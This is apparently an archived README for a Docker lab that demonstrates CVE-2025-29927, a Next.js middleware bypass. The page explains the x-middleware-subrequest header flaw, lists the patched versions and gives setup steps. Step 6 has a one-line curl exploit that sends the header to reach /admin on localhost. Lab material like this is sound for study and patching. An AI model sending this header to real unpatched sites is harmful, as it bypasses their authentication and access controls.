关联漏洞
描述
Next.js Middleware Bypass Vulnerability
介绍
# CVE-2025-29927 (Critical - 9.1)
Next.js Middleware Bypass Vulnerability
Hands-On of CVE-2025-29927 vulnerability in Next.js application where the internal header x-middleware-subrequest can be used to bypass middleware authentication and restricted access.
# Explained
Next.js use an internal header "x-middleware-subrequest" to prevent recursive requests from triggering infinite loops. The security vulnerability shows it's possible to skip running Middleware, which could allow requests to bypass critical checks—such as authorization, cookie validation—before reaching routes.
# Patched Versions
Next.Js 15.2.3, 14.2.25, 13.5.9, 12.3.5
# Setup Environment
1) Clone this Repository.
2) Start docker in your system
3) Go to repo path & build the image with: docker build -t nextjs-docker-demo .
4) Next, run the container: docker run -p 3000:3000 nextjs-docker-demo
5) Access the environment: http://localhost:3000
6) Test/Exploit: curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
# Official Blog
https://nextjs.org/blog/cve-2025-29927
文件快照
[4.0K] /data/pocs/36be2df177b908fd1f631e15fb56d3175be6e47b
├── [ 339] Dockerfile
├── [ 583] middleware.js
├── [ 323] package.json
├── [4.0K] pages
│ ├── [4.0K] admin
│ │ └── [1.2K] index.js
│ ├── [ 953] index.js
│ └── [2.8K] login.js
└── [1.1K] README.md
2 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。